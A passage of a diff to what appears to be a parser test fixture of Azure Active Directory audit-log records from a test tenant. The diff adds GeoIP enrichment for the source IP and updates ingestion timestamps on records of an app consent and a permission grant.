"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -9600,6 +10200,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -9769,7 +10381,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125133800Z", + "ingested": "2021-12-14T14:48:43.176700819Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3393756Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118027\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"0031778a-80cf-49f8-aea2-f798c9bf1ec9\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -9796,6 +10408,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -9965,7 +10589,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125140500Z", + "ingested": "2021-12-14T14:48:43.176701519Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3393756Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118027\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"0031778a-80cf-49f8-aea2-f798c9bf1ec9\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -9992,6 +10616,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -10158,7 +10794,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125147200Z", + "ingested": "2021-12-14T14:48:43.176714527Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.3343965Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43118019\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -10185,6 +10821,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -10351,7 +10999,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125153900Z", + "ingested": "2021-12-14T14:48:43.176715909Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\